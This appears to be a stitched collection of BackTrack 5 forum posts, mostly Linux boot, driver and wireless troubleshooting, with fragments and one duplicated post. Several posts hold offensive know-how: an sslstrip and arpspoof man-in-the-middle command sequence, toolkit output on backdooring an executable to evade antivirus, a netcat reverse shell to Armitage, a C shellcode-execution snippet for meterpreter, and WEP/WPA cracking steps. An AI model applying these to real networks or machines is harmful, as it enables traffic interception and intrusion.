Connect to the internet, either through Cat5 or wireless (wicd network manager) (wont go into internet connection detail as you can find that info all over the forum)

you are just changing "text" to "quiet" and "nomodset" to "i915.modset.modeset=1"

then hit ctrl-x to boot

Wait for Backtrack to boot and you should now see the pretty blue logon window. Login using root/toor and see your new desktop resolution (1366x768). You will now noticed if you go to your display properties that you have access to your VGA and HDMI ports too. I have tried this with my VGA and it works pretty good.

If your display works for you, make the changes permanent by editing /etc/default/grub file with the changes above.

Note: Some desktop effects in BT may crash while using the new intel drivers, this is normal as there really isnt a way to fully support he optimus video yet. Just click continue to the crash and BT will automagically disable desktop effects.

OK, so why go through all of this?? Well the reason is that with the new intel processors they use a Sandy Bridge chipset, which on the M14X, utilizes a combination video of Intel and nVidia. The problem is that there really arent any linux drivers out there that can combine the two cards to automatically swap between them. However, bumblebee is becoming very close to making this work. https://github.com/MrMEEE/bumblebee
This project is trying to fix the issues with linux and optiums video. You are more than welcome to install it and test it on your box, but after days of trying to make this work it seems there is an issue with bumblebee and the kernel, even though the install completes and I can see the nvidia xserver, it never fixes my ability to use both cards or disable my nVidia. I have to give this guy credit as alot of other people have had success with his installation. If anyone makes this work on their M14X please let me know I would love to use it.

I have searched for a good while for a fix to get my brightness settings to adjust. They're all the way up right now and in low light it is really murder on my eyes. Display settings show no option to adjust and the Fn keys don't have an effect either. I have the exact same problem in Ubuntu 10.04 but I have a new kernel that is made for my laptop (Dell Inspiron 14R n4010) that fixes the problem and makes my Ubuntu partition work flawlessly. It's three .deb files that make this kernel up and since BackTrack 5 is made off of Ubuntu 10.04 I figured that I would try to install these with
Code:
dpkg -i file.deb
and they all install perfectly. I reboot, and my grub menu doesn't show anything different than before. Just my Ubuntu, Windows, and then BackTrack. I did run
Code:
update-grub
as well and checked in Synaptic to confirm that they was installed. My question is, can BackTrack use a different kernel and if so, is there a conflict of using the same kernel on two different distros on the same machine?

I appreciate any help and just let me know what output y'all would need to see to help troubleshoot this. I would have included some but I don't know what output would give any help to this issue.

I have no idea what I'm doing wrong here. Everyone else on the internet seems to get this thing to work first try no problem, but I've been at this thing for two nights now, followed dozens of subtly different directions, and the end result is always the same: Gmail, facebook, etc. still have the HTTPS links intact and sslstrip log files are empty which proves that nothing was captured.

The commands I use are all taken directly from the sslstrip website:

echo 1 > /proc/sys/net/ipv4/ip_forward (for the record I've tried the variants where you put the 1 in "" and '')
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (also tried 8080)
python sslstrip.py -w filenamehere.log (also tried it with the -a and -k commands, and -l 8080 when I used 8080 as the redirect port; I've also done it where I ran the setup.py file first)
arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1 (also tried it without a target, and tried every single address I found on my network with no results; and yes, I'm sure wlan0 is my wireless adapter and that 192.168.1.1 is the router address since that's listed as the gateway when I do a route command, and it's the address I have to type in to get to the router administration page)

I've tried using my own machine as the victim machine and my phone (hooked up via wifi). In both cases every SSL page I visited still had SSL.

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[!] UPX was not detected. Try configuring the set_config again.[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.

************************************************** ******
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
************************************************** ******

Hello, I am attempting to install BackTrack 5 GNOME x64 onto a USB key containing GRUB2. I would like to be able to use the USB key to load multiple distributions of Linux and other various tools, which is why I chose GNOME as the bootloader.

Because I want to be able to boot ISO files from GRUB and have one large USB key with a bunch of useful tools, including BackTrack, a UNetbootin burned ISO is not much use of mine. I do not have difficulties creating one. I am looking specifically for a way to be able to chainload to GRUB or use GRUB with BackTrack.

menuentry "Grub4dos"{
linux /grub4dos/grub.exe
}
For convenience, here is the BackTrack 5 entry by itself:
Code:
menuentry "BackTrack 5" {
loopback loop /BT5-GNOME-64.iso
linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/BT5-GNOME-64.iso noeject noprompt splash --
initrd (loop)/casper/initrd.gz
}
Unfortunately, upon boot, after sitting on the splash screen for several seconds (no text, just the BT5 background), I eventually get "(initramfs) Unable to find a medium containing a live file system" and I get dropped into the Ubuntu minimilist shell. I would provide more information, however I do not know what information specifically to look for or is applicable here.

I attempted it, hoping I could chainload GRUB from syslinux somehow, however the USB drive does not boot (it simply black screens with a white blinking cursor and hangs the system). I did not get any error messages during the process, and a Linux OS recognizes the USB, it just will not boot (I have tested other USB boots on the system in question, including a UNetbootin of BackTrack which works fine).

Questions:

1) Is it possible to boot BackTrack directly from ISO from GRUB?
2) If it is not possible, what are my alternatives? Am I able to have a (preferably persistent) installation of BackTrack be loaded by GRUB in a different fashion?
3) I've considered using two partitions on my USB, one with BackTrack installed without a bootloader, the other the active boot partition with GRUB that has an entry for BackTrack. Is this possible, and a good alternative to using the ISO directly?

I'm a beginner, I have windows 7 so installed BT5 side bye side of windows , I have an internal wireless card (atheros 9002wb-1ng) and when I tried to check aircrack-ng injection test (aireplay-ng -9 wlan0) I get this

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
---
and this what i get when i use dmesg

Created live USB with GRUB2 and several different tools. The drive is formatted as fat32 and it works with other distributions of Linux loaded as ISO files [eg Ubuntu].

Attempting to add the BackTrack 5 ISO to be booted. Unfortunately, I get "(initramfs) Unable to find a medium containing a live file system" and I get dropped into the Ubuntu minimilist shell (after the BackTrack 5 splash is displayed for about 30 seconds).

menuentry "Grub4dos"{
linux /grub4dos/grub.exe
}
Is it possible to load BackTrack the way I am attempting? Where did I go wrong? If it's not possible, what are my alternatives for putting BackTrack on a multi-boot USB key?

Hi every one, except dummyOnes! :p
I have a bt5 on vbox 4.0.10 and a TL-WN721N usb wifi.
unfortunately they don't like each other!
I googled the issue and found some solutions but none of them worked...

I have a BT5 installed on a netbook. I am trying to share my wireless connection to my ethenert port so that i can connect other devices to my netbook.
I have tried many guides but nothing worked with BT5. I searched the forum but haven't found anything. Any advices?

Hi,
my aim was to make a multi boot USB thumb drive with 3 primary partitions (all formatted with ext3). The first one is the boot partition, got a size of 4 GB and was created for BT5. This partition was called 'backtrack'
I tried this on my notebook within an openSUSE 11.4 standard installation. I followed also this official tutorial: http://www.infosecramblings.com/back...changesnessus/
But this command
Code:
grub-install --no-floppy --root-directory=/mnt/bt5 /dev/sdb
told me this:
Code:
WARNING! You are trying to invoke the unsupported grub-install script
with a parameter. To really do this, call grub-install.unsupported.
You should rather call "yast2 bootloader" or create configuration files
appropriate for the intended target.
So, I thought 'OK, why not?' and I tried this command:
Code:
grub-install.unsupported --no-floppy --root-directory=/mnt/bt5 /dev/sdb
but this command failed, too with this error message:
Code:
Probing devices to guess BIOS drives. This may take a long time.
/usr/sbin/grub-install.unsupported: Zeile 444: /usr/sbin/grub-set-default: File or directory not found.
The file /mnt/bt5/boot/grub/stage1 not read correctly.
I have read the error message, but I did not understand, what it wants to tell me. I did not try this command again, I just stopped after this error message. So please help me, I actually do not know what the problem is.

I bought a new laptop some days ago. But I think it's too new ;)
Every Linux distribution I try fails to boot properly. Near the end of the boot processes my screen just turns black and the laptop doesn't respond to anything.
I have been using Linux for some years now and normally I can figure it out when I come across something. But in this case even safe modes do not work.
The (relevant) specs:
It's an Asus N53SV
i7-2630QM
540M

I think it has something to do with the sandy bridge and the Linux kernel.
Haven't tried to build my own and newer Linux kernel yet....

Hello, I am an IT security student new to arch. I am currently trying to set up my Alfa AWUS051NH usb wireless adapter with my arch desktop. I have it running somewhat, but not at the speeds I would like. I found on alfa's website that the device can either use chipsets: Ralink RT2770, or RT2750. I thought an iwconfig would tell me what chipset the device was using, but apparently not.

So I did a lsusb and got:

Code:
Bus 001 Device 002: ID 148f:2770 Ralink Technology, Corp. RT2770 Wireless Adapter
I look at an iwconfig and see it changes from bit 5-150mbps at any given time.

Code:
iwconfig wlan0 rate 300
&
Code:
iwconfig wlan0 rate auto
But neither have any effect. I believe the issue is that the card can use a/b/g/n standards and is not using 802.11n, which I believe is the only one that can use 300mbps. My router is broadcasting in 802.11n by the way. I don't know how to force the device to use the 802.11n.

So does any one have any ideas, and can answer some of my questions? I would very much appreciate it. If any commands are needed to be run for more information I would be glad to do so.

mods: please merge this with the post from this morning.. after doing some research i realized that the original script was messed up.. thanks!

Copy and past the code into a new file named flashcleaner or whatever you like.. then execute

Code:
chmod +x flashcleaner
then run it form within the directory it's located by typing

Code:
./flashcleaner
enjoy!

Code:
#!/bin/bash

#Backtrack flash cleanup script
#by J0hnnyB14z3
#100% based on the backtrack how-to in the wiki found here http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player .. I take no credit for anything more than assembling the script and automating the process. Thanks to the folks who put the wiki together!

Fact :
First of all, you should root your Dell Streak 5. I have tried many methods to root Dell Streak 5 but unsuccessful. I nearly to brick my Streak. Fortunately, I re-flashed the recovery image and rescued my Streak.

Now, I would like to show you how to root your Streak by mean of install a custom ROM - SimpleStreak which is developed by Spidia. The current SimpleStreak is 1.2 and based on stock ROM 2.2.2. It is the easilest way to do so. If you do so, your Streak cannot be unrooted and the warranty will be voided. The ROM will be the SimpleStreak 1.2.

Installation of Back|Track 5 does not harm your Streak as it use VNC to load the Back|Track 5 image.

The aircrack-ng does not run properly as the interface is eth0 instead of wlan0. There are no monitor mode and no injection too.

I have been trying to install the NVIDIA driver for my card (GeForce 8600M GT) for the last two days. I have searched around but nothing seems to fix my problem. When I start the driver installer, it begins nagging about that it doesn't find the kernel source tree and something. There is not really much to say about it, other than that I really need help and I hope someone on this forum is willing to help a newbie like me.

I downloaded the KDE version of BT and when I run "unname -r" it says "2.6.38". Please tell me if you need some more info about my system.

Using: nvidia-installer ncurses user interface
-> License accepted.
-> Installing NVIDIA driver version 275.09.07.
-> Performing CC sanity check with CC="cc".
-> Performing CC version check with CC="cc".
ERROR: Unable to find the kernel source tree for the currently running kernel.
Please make sure you have installed the kernel source files for your
kernel and that they are properly configured; on Red Hat Linux systems,
for example, be sure you have the 'kernel-source' or 'kernel-devel' RPM
installed. If you know the correct kernel source files are installed,
you may specify the kernel source path with the '--kernel-source-path'
command line option.
ERROR: Installation has failed. Please see the file
'/var/log/nvidia-installer.log' for details. You may find suggestions
on fixing installation problems in the README available on the Linux
driver download page at www.nvidia.com.

After the ssh video I decided to record the next one, these were initially just for my reference as I'm pretty forgetful, however g0tmi1k suggested I should publish them.

So first of all I looked at how to set-up/install pyrit, it has been covered in the How to section and this is where I got the commands from.
However I still recorded a video for it here:Installing pyrit in bt5 Blip.tv

There is other links on the bottom of the blog post for those who don't like blip.

Once pyrit was set-up and had been benchmarked, I looked at cracking WPA.

This is the same as cracking WPA with any other program!

Firstly it has to be your own router or you must have permission from the administrator.
Secondly the key that your cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecsurepass'.
Finally their access point has to have a client connected because during the process of capturing a handshake, the client is de-authenticated allowing the handshake to be recaptured.

I know there are many ways of doing this and I know that I only used a low number of passwords in the list but this is just to give people an intro to using pyrit and what it can do!
Any suggestions and tips will be greatly appreciated.

Has anyone managed to get a NATIVE install of backtrack or any other linux distro on an android powered phone? Not the chroot+vnc method, thats to easy. I have a mild understanding of linux internals, how could I use the kernel source from my android phone (epic) and compile a bt-compatible kernel?

i have the Ar5007EG wireless card and i have spent nights looking at drivers, madwifi, ndswrapper and so on...
my problem is on my laptop in windows you need fujitsu launch manager (.exe) to start the wireless, there is no other way. anybody found a way?
yes i have tried WINE,

I have a little issue and I hope to find a solution with your help. So please find below from where the problem is coming:
1. I have a windows xp box behind a router;
2. A netcat application connects from the windows box to a Backtrack5 box(having an external IP) via Internet;
3. I receive that connection using Armitage(Listeners --> Reverse(wait for) --> shell) and I get a shell.
Everything is ok so far but now I would like to obtain a meterpreter connection and I don't know how to do this(I mention that if using Armitage(Listeners --> Reverse(wait for) --> meterpreter) that's not working, I mean that nothing happen after I start netcat connection on windows box.
This is my problem and I want to let you know that I remain grateful for any replay.

Installed BT5 KDE 32 on a Dell Inspiron 1525 hard drive. I go to Backtrack/Exploitation/Social Engineering tools/Social Engineering toolkit/Set. I update it. When I go to run it again I get this error?

im new to linux i used bt4 on my compaq c500 then gots a new laptop (compaq presario cq56) and dual booted with bt5 and windows 7 my wireless works fine with windows but when i go into bt5 my cards not even detected i did some research and my card maker makes linux drivers woot woot (Ralink RT5390 802.11b/g/n) so now my only problem is installing it i have no idea what to do can i hook it up to a lan with ethernet and do an apt-update or do i have to do it manually with the makefile?

I recently downloaded BT5-GNOME-64.iso and installed it as a vm. I am able to install it via the install script on the desktop. I then configure everything the way that I want it (I reboot several times during the configuration) but if I do an apt-get update, when I reboot the vm, upon boot up I I get a purple screen that pops up and it say "Ubuntu 10.04" with scrolling dots below it and then it gives an ALERT! error and drops into a command prompt. I did some research and everything I have read says I need to mount the proper File system to boot up. When I do an "fdisk -l" I get the error "command not found. I am not able to do anything other commands either. I am wondering if anyone else has seen this? And if so, what they have been able to do to fix it. Thank you in advance for the views and replies.

hey guys, im sure that most have you heard of the wifi pineapple.
If u havent, its pretty much a router which takes advantage of the devices that send out probes for remembered wifi networks.... the router responds to probes, so the device thinks that its the actual remeberd wifi network from home, work or wherever.

What i am keen in understanding is exactly how does that work. Like when you remember a wifi network on your device, you tend to have encryption enabled such as wpa etc. How does that authentication work.

A is communicating via http to B with some GET request.
After some time
A request a specific web page
[Mark]
B answer with the page

My need is that at [Mark] i inject a packet, sending to machine A the page that I want.
Of course B will send the packet as well, but latency is on my side, cause i'm on the same machine (or lan) of A,
so the B real packet will be rejected.

Was using backtrack5 on a hard drive. made some changes (like adding remastersys!) and did a backup(using remastersys). replaced my current version of backtrack5 on a usb stick.
Boots into command line with
postgres@postgres$

I used to be root#

What happened?

tried login root and got

Cannot possibly login as root without user

So, I asked the author of remastersys what's up and he said:

The backtrack folks must do something different than ubuntu. When you remaster, you are remastering like ubuntu and it appears the backtrack devs do something different.
The ubuntu live scripts called casper basically disable the root account during live boot.
If you can find out from the backtrack folks what they have done differently I might be able to do something about it.

Hi, i am new to backtrack but have been using linux for sometime now. I downloaded an ISO image of backtrack 5 yesterday , i checked it using the hash check and it was ok , i burnt the iso image and restarted my laptop and the cd did not boot all i see is a black screen with linux information and a few ther things but the laptop was processing so i left it for an hour and came back but it was still there i pressed the entre key and it said kernel image not found......please help me to solve this problme...

My goal is to fakeauth with my alfa card to my AP by using a PRGA .xor generated via a fragmentation attack. Yes I know there are other ways I can inject (e.g. spoof my other client's MAC as my own after deauthing the other client, etc and fakeauth as that source mac). I don't want to do that because in a real life scenario (i.e. a pentest) it could be noticed and a good attacker probably would try to avoid it. Anyway - that aside, I must be missing something stupid here:

First I monitor my AP via airpdump-ng with:

Code:
airodump-ng -c 6 --bssid $ap -w wepviaclient wlan0
And see the output w/ no problem, my PC connected to it, etc. (I'm posting this from a different computer so I can't copy and paste the output right now and I don't think it's necessary for this cause I know it's correct).

The one thing I don't quite understand are the -l and -k switches when generating the .xor (I assume this is just so the AP will pass the packet through but some clarification there might be the key). Any ideas what I'm doing wrong? I feel like it's something very simple that I'm missing. In the mean time, turning off SKA or generating ARPs as an auth'd client works fine to increase IVs and I have already cracked the key several times. I don't know if this is really relevant to the course or not but I really want to know why this doesn't work.

im attempting to install bt5 on a completly wiped and formatted hard drive (netbook) i have two partitions both formatted ext3. install goes fine untill step 4 (formatting and hard drive options) it just hangs. I tried to install gparted to make sure my partitions were ok but it also crashes when loading. Any ideas where i may be going wrong? Im using a 4G usb created on a seperate computer with Unetbootin... i do not have a CD drive.

Hey all, I recently set up BT5 and Windows 7 as a dual boot on my laptop. It's been working great, but I've had a big annoyance for the past couple days. Probably every minute, a little notification pops up in the center of my screen telling me the current brightness of my laptop's screen, and then it moves the brightness either up or down, almost randomly. I downloaded the drivers for my video card a couple days after installing BT5 because of the "black screen" problem. It might have done that before the driver download and I didn't notice, idk.

Anyways, I have an ATI Mobility Radeon HD 5700. Has anyone had the same problem and found a fix for it?

Hello guys. Yesterday i installed Backtrack 5. After 5-10 minutes from a boot up, backtrack freezes. I've searched a little and i found that it was a problem with the drivers of ATI so i downloaded ATI 11.6 and i installed it from the run file. Now some of the effects doesn't work such as blur, wobbly windows, fall apart and others. I have Mobility Radeon 4650 and Backtrack 5 KDE. Does anyone know how to fix this?

I know this is a widely discussed topic, using the acpi=off flag in the boot options to get bt5 to boot properly on many different machines. That is fine, however once booted the acpi=off flag makes it to where I can not use or enable wifi (they need power management).

Is there a workaround for this issue that still retains the functionality needed with backtrack? or am I stuck with a VMed BT5 until we get an r2 version?

I already use the i915.modeset=1 flag to get passed the black screen bug however the error I recieve afteward is a full page of code that starts with

"NULL: pointer deference at (location changes)"

the research I have done says its a common bug with the build of ubuntu that bt5 is based on but I have not found a resolution as of yet.

Hello,
I tried to boot Backtrack 5 GNOME with live DVD, but it didn't work.
Later, i tried to boot it via USB Live with unetbootin, didn't work also.
I downloaded Backtrack 5 KDE, burned to another DVD again and USB, didn't work again.... :(
I will explain what happens:
I have UBUNTU 10.04 LTS installed on my lap, and when i insert the DVD/USB it shows the boot screen..
I choose the first option, then the Backtrack 5 wallpaper shows, and it logs me into the Backtrack Terminal.
I type root and toor, and it logs me in !
But, when i type startx, it conflicts with my Ubuntu and logs me into Ubuntu, and the panel is crazy, the wallpaper is the default ubuntu wallpaper, and there isn't any tools at all....
This happens only on my laptop[i686] with Backtrack 5 GNOME & KDE, my other desktop works perfect with the DVDs and USBs.

Backtrack 4 R2 Boots perfectly on my laptop, but i don't like it because of many reasons.

Hello, I am a backtrack/linux newbie,i very love to using linux/backtrack,when i run into windows,everything looks fine,but when i run into linux(backtrack5),i get my notebook so hot,betwen 70 C - 80 C,even i just using on text mode,,the one linux distro that not make my notebook hot just Pentoo2009.

can anyone can help me what i must to do to fix this problem? i really would love to use backtrack

Hello, just wondering if anyone has successfully installed Backtrack on a Genesi Efika MX Smartbook, Thinking about buying one very soon to run it on, but was wondering about it. Please let me know. Cheers.

Hello,
A n00b question.
Considering moving to an iPhone. if i do that, want to have backtrack available at all times. Heard that was possible but couldn't find any tutorial or information about how to do that.
Can anyone recommend on such a tutorial or can instruct me how to do that?
Thanks,
Gabriel

I was running BT5 on a live CD on one of my computers. I was experimenting with 'chntpw'. When ever I would try run 'chntpw' it would say

Code:
The program 'chntpw' is currently not installed. You can install it by typing: apt-get install chntpw
You will have to enable the component called 'universe'
On running
Code:
apt-get install chntwpw
it says
Code:
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded
when I move to
Code:
/pentest/passwords/chntpw
and run
Code:
./chntpw
I can run 'chntpw' weird (any ideas for future how I can get this program running without being actually in it's directory)

--------

So I mount my windows drive in a temp folder navigate to
Code:
Windows/System32/Config
Failing to run 'chntpw' I unfortunately came up with this genius idea to mv the SAM/SYSTEM file to the 'chntpw' directory.

From here I can run ./chntpw I moved the files back and rebooted.

On a second computer I run the exact same steps as above except FORGET TO MOVE THE SAM/SYSTEM FILES BACK

I rebooted and now windows can't find the SAM/SYSTEM file so is locking me out.

Is there a way to recover a backup version of SAM/SYSTEM?
What's the best way to recover my files (I can see them using a live cd of BT)?

I was running BT5 on a live CD on one of my computers. I was experimenting with 'chntpw'. When ever I would try run 'chntpw' it would say

Code:
The program 'chntpw' is currently not installed. You can install it by typing: apt-get install chntpw
You will have to enable the component called 'universe'
On running
Code:
apt-get install chntwpw
it says
Code:
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded
when I move to
Code:
/pentest/passwords/chntpw
and run
Code:
./chntpw
I can run 'chntpw' weird (any ideas for future how I can get this program running without being actually in it's directory)

--------

So I mount my windows drive in a temp folder navigate to
Code:
Windows/System32/Config
Failing to run 'chntpw' I unfortunately came up with this genius idea to mv the SAM/SYSTEM file to the 'chntpw' directory.

From here I can run ./chntpw I moved the files back and rebooted.

On a second computer I run the exact same steps as above except FORGET TO MOVE THE SAM/SYSTEM FILES BACK

I rebooted and now windows can't find the SAM/SYSTEM file so is locking me out.

Is there a way to recover a backup version of SAM/SYSTEM?
What's the best way to recover my files (I can see them using a live cd of BT)?

I have successfully installed pyrit, the latest ATI drivers, and AMD-APP-SDK (tested the samples and they pass).

I am now trying to install Cpyrit-OpenCL to make use of my ATI card.

When I go to build setup.py this is what I get:

Code:
The headers required to build the OpenCL-kernel were not found. Trying to continue anyway...
svn: '.' is not a working copy
running build
running build_ext
Building modules...
building 'cpyrit._cpyrit_opencl' extension
gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -I/usr/include/python2.6 -c _cpyrit_opencl.c -o build/temp.linux-x86_64-2.6/_cpyrit_opencl.o -DVERSION="0.3.0"
_cpyrit_opencl.c:23:19: error: CL/cl.h: No such file or directory
_cpyrit_opencl.c:46: error: expected specifier-qualifier-list before cl_device_id
_cpyrit_opencl.c:57: error: expected =, ,, ;, asm or __attribute__ before * token
_cpyrit_opencl.c:58: error: expected =, ,, ;, asm or __attribute__ before num_platforms
_cpyrit_opencl.c:63: error: expected ) before error
_cpyrit_opencl.c: In function oclplatf_init:
_cpyrit_opencl.c:122: error: cl_uint undeclared (first use in this function)
_cpyrit_opencl.c:122: error: (Each undeclared identifier is reported only once
_cpyrit_opencl.c:122: error: for each function it appears in.)
_cpyrit_opencl.c:122: error: expected ; before num_devices
_cpyrit_opencl.c:123: error: cl_int undeclared (first use in this function)
_cpyrit_opencl.c:123: error: expected ; before err
_cpyrit_opencl.c:130: error: num_platforms undeclared (first use in this function)
..... many more similar errors
I fear that although working, I may have installed either my ati drivers or the ATI APP wrong, or in the wrong place.

I admit I am probably testing my limits since I am fairly new to linux.

I've searched and the only thing that seemed to relate to my problem was someone saying that GCC was a different version than the ATI driver used, but that didn't really make sense to me. Any ideas? If more info is needed let me know and I will gladly provide it. Thanks in advance.

I have installed the above and was wondering the folowing as i have no disk space left without reallly doing anything.

1 - Does BT boot from the first partition which is 2.5G ?
2 - What files are loaded on partition two which is 5.5G in my case ?
3 - When installing or updating BT were do the files write to, partition 1 or 2 ?

Partition 2 is totally full and i guess i'm wondering if i can safely delete any files to free up space.
I know this may be a basic question to experienced user's but any guidance is welcome.

So, I've repeatedly installed BT5 in a VMWare, but whenever I do, the system monitor always says that there is 0 bytes of hard disk available, and I always run out of memory after 500 MB. Do i need to manually mount the HD or allocate a partition for VMware to use?

I am wondering how to install the VMware Fusion Tools I am running on my MBP for BackTrak5? Every post I read says that that after selecting install tools, the media disk that mounts is titled VMware Tools, but on mine it is titled BT5 and when I go looking in its contents there is nothing showing that matches up with the walk through that I see on-line. Can anyone help?

I'm using the wireless network manager under the internet tab in the applications menu. I have successfully cracked a WEP. However, when I try to connect I get passed the validating passphrase however I then get an error, Can't connect to IP. Like I said, I can crack the WEP key so I dont think it's a driver issue (I could be wrong, I am absolutely new to Nix). I'm dual booting with Ubuntu and can connect just fine to the same access point with the key.

Though not strictly a 'backtrack' question, I was wondering if anyone remembered the convoluted batch command from the old version of Metasploit Unleashed that would recursively uninstall all of the patches on the FDCC image?

Hey everybody. Okay. So I'm pretty good with computers, but I am completely new and a beginner when it comes to Backtrack, Linux, and everything to do with it. Like can't get VLC to work, don't know how to download and install stuff...just totally new. Ha I have a default wireless card in my laptop, but just bought AWUS036H to use instead. I know it's set as wlan1 or whatever by running airmon-ng. However, I'm trying to figure out how to set it as my default card so that it shows up in Wicd manager. Right now I'm pretty sure it's still using my first wireless card since I should have more networks popping up and stronger signals. So I need to know exactly what to do in order to use this card and set it as my default so that it is used in the Wicd manager to search and connect to networks.

Have Windows 7 installed, but running Backtrack 5 as my OS (not using VMware or anything). Thanks in advance...

In the first menù i chose the option "Backtrack Forsensics - No drive or swap mount" an after few seconds appears on the screen a terminal full of text but I can't write. this page rest on the screen until I restart my pc. What can I do?
Apologies for my bad english

hi all...i have created a Shell Script that let me run my Wireless Card in Monitor Mode...my question is...How can i stop the Terminal from Auto-Exit? because i want to see the echo msg that i put into the script...but when i run the script the terminal do the job without let me see the echo msg...THANKS!!! =)

Hi,
I'm running BT5 gnome on encrypted USB. I have tried EVERYTHING to change the backsplash with no luck. Even utilities like ubuntu-tweak don't work. I suspect it could have to do with the bootsplash being on the smaller 500mb partition used for booting. To update my grub list I had to make the changes and run update-grub on my primary partition and then copy the grub.cfg to my boot partition. Any ideas?

I am brand new to the world of Backtrack and am in need of a an answer to a seemingly easy problem! I installed the Gnome 64bit version of BT5 on my laptop and everything seems to be working.

I am trying to log in to my school's public wireless network. Typically I would try to connect and windows 7 would then say limited connection etc.. And I would accept some terms and then login with a username and pw. With BT5 I try to connect to a network and it tries to get an IP, but don't know how to log in to the network to receive that address.

Then you set the value of e.g. "command_1" to the command you want to run which is "gnome-terminal" (without quotations).

Now we need to find out the hardware name of our WIN key. Mine is "Super_L". I don't know if it's the same on every pc/laptop. To find out run "xev" from terminal and hit the WIN key. If you don't know what to look for hit the left ctrl key. If you look at the prompt that will appear you will see "CTRL_L" somewhere in there. When you press the WIN key look at that exact place to find out the hardware name of your WIN key.

Remember this name.

Now in gconf-editor navigate to "apps/metacity/global_keybindings" and select "run_command_1" edit the value and enter the name of the key (in my case "Super_L" ).

I just wanted to know how to execute shellcode in python/perl like i do in c using
Code:
int main(void)
{
((void (*)(void)) shellcode)();
}
I created a linux/x86/meterpreter/bind_tcp shellcode with msf, which means there are 2 stages.
I don't know how to load and execute these two stages in order to run a python/perl script like a compiled c shellcode.

I had the 32 bit version of BT5 installed and it seemed to be working quite well. I decided I wanted to install an SSD on my system. The cloning process went terribly wrong, something to do with copying grub over. Needless to say had to do a fresh install on both windows7 and BT. I decided that this time around I would try out 64bit BT. I have not really seen any speed boosts but have noticed some quirkiness in the way some of the programs run now. The gerix wifi cracker gui worked fine on 32 bit but it seems that some of the underlying code is broken in 64 bit. There was a pipe error when trying auto populate the mac and I have not been able to get a "cracked" hex password to work in testing. But this is only one example. I have also seen what appears to be a bit of a slow down on loading on boot. I am about to move BT off of my HDD and on to a partition on the SSD but am looking for advice on which version to use now. 64 bit or 32 bit?

Yes I know the net and this site are full of instructions on using unetbootin, usbinstall, linuxliveinstall, yumi on installing a bt5 image to a usb stick. In general, these methods copy a squashfs image and a couple of other files. The 'install' doesnt look anything like a normal linux install with the usual directories (var, etc, bin, sbin...)Why is this? Is the bt5 live install basically an image that gets loaded into ram? Is this for security for for the longevity of the usb?

If someone has bt5 on a liveCD, what's wrong with using the 'install backtrack' shortcut that's on the desktop to install to a usb?

But this is for repackaging a modified but not installed ubuntu liveCD
Instructions for repackaging BT4 are herehttp://www.offensive-security.com/ba...e-tutorial.pdf
but the link mentioned in there does not work. And the reference to remastersys is generic but not instructive.

Is there any faq on repackaging bt5 that I may have missed in my searches?

hello guys
my new (horrible) video comes from reading a wonderful, interesting, amazing BLOG.I just changed ONLY the "Scenario" (even more because my head would not be able to do anything else!) all the credit goes to him! many thanks for your jobs.Many, many thanks to a "BIG" g0tm1lk
ps (sorry for the quality but my old PC+old nvidia is dying ...)...my career as a "video director" is ending so maybe it's better !!! :):):)muahahahaha!
if you want to watch:http://vimeo.com/25605168

Guys, I can't seem to get BT5 to install to my drives. I'm running win7x64 (which will hold the bootmanager) on a SSD 60 gig, then my games are on 2x 1tb caviar blacks in raid; and i have a 1tb black that i want to update to BT5 (it had 4 on it, but i reformatted and started to use it for storage but eff that.)

I get an error message when using the installer on the livecd desktop.

Also, it's semi-unrelated, but i was getting the startx error, the remove themes fix works, but it seems that i still have to install the newest ATI drivers via command line (ATI 5970 black edition) to get anything going.

Also, I had to burn a dvd, for some reason I couldn't get BT5x64 working on an 8 gig thumbstick, but i was able to use it a few days ago for my netbooks x32 install.
Also, I get a good 30 seconds of error messages when the live cd is first starting. The most i've been able to read is something about ati, so I'm assuming the drivers on the livecd are bad. And yes, I am MD5 matched. Does the same with both distros.

Any help at all would be super appreciated. My alfa is begging to be used again :(

I have been trying to get BT5 installed of my Dell Inspiron 1564 - but have had a number of problems. I have used previous versions of BT for several years, but I am not a Linux expert....I rely heavily on these forums for fixes.

I have tried both BT5 64bit Gnome and BT5 64bit KDE. I can get both installed, but with Gnome my sound doesnt work. So right now I am using KDE.

When I first got it installed, I had a problem with startx not working which was documented on these forums...and I successfully used the fixes to solve that problem.

I have 2 current problems - first, I am having big problems with my built in wireless - it is a Dell Wireless 1397 mini-card rev 5 (BCM 4315 based). First of all, it won't stay connected to my AP - it drops the connection repeatedly. And second, for some reason it isn't automatically getting configured with the DNS servers I use. When I use a wired connection, it picks up which DNS servers I use. I also have an Alfa AWUS036H and it works fine....it doesnt drop its connection with my Access Point, and when I connect it to my AP, it gets set up with my DNS servers.

The second big problem that I have been having has to do with crashes/hangs. They seem to happen when I am using the touchpad (Alps). I am at a different computer now so I cant post any logs....but I will do that later.

I think I will attempt to try BT5 Gnome 64bit again and see if I have any luck with it - I don't recall it crashing every few minutes. However, the Broadcom issues were present in that version as well.

Even though I have been experimenting with BT since BT3, I'm still a bit of a BT noob, but I hope someone can help me with my problem.

I've decided to install BT5 in Parallels (on a Mac) as a virtual machine since triple booting is a bit of a pain and I cannot give up my Windows partition (I need that one for work ;)). After setting everything up and installing some drivers, everything worked fine, until I've decided to install the parallels tools (since the newest version is supporting Ubuntu 11.04 systems). Since then some settings seem to deactivate themselves regularly. These include:

-Desktop animations (they are deactivated immediately upon restarting them...)
-The size of the (manually maximized) panel returns to half the screens size after every reboot
-The boot screen is now at a 800x600 resolution

